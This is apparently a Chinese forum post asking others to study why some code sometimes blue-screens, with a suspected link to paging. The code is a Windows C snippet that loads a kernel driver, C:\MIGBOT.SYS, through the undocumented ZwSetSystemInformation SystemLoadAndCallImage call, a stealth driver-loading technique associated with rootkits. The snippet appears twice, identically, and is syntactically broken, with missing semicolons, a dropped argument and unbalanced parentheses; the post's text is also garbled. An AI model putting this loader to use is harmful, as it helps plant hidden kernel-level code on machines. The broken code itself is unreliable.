大家一起倆研究下看看,好像有時(shí)候會(huì)藍(lán)屏,跟分頁有關(guān)
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
#define SystemLoadAndCallImage 38
bool load_sysfile()
{
SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
WCHAR daPath[] = L"\\??\\C:\\MIGBOT.SYS";
RtlInitUnicodeString = (RTLINITUNICODESTRING)
GetProcAddress( GetModuleHandle("ntdll.dll")
,"RtlInitUnicodeString"
)
ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION)
GetProcAddress(
GetModuleHandle("ntdll.dll")
,"ZwSetSystemInformation" )
RtlInitUnicodeString(
&(GregsImage.ModuleName)
,daPath
);
ZwSetSystemInformation(SystemLoadAndCallImage,
,sizeof(SYSTEM_LOAD_AND_CALL_IMAGE))))
return true;
}
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
#define SystemLoadAndCallImage 38
bool load_sysfile()
{
SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
WCHAR daPath[] = L"\\??\\C:\\MIGBOT.SYS";
RtlInitUnicodeString = (RTLINITUNICODESTRING)
GetProcAddress( GetModuleHandle("ntdll.dll")
,"RtlInitUnicodeString"
)
ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION)
GetProcAddress(
GetModuleHandle("ntdll.dll")
,"ZwSetSystemInformation" )
RtlInitUnicodeString(
&(GregsImage.ModuleName)
,daPath
);
ZwSetSystemInformation(SystemLoadAndCallImage,
,sizeof(SYSTEM_LOAD_AND_CALL_IMAGE))))
return true;
}